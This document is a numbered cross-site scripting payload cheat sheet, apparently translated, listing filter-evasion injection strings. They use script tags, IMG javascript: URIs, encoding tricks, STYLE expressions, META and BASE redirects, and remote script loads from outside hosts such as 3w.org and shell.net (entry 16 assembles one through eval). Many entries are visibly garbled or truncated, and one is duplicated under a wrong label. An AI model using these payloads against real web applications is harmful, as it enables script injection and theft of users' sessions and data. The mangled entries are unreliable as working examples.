(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative popups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective domestically, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>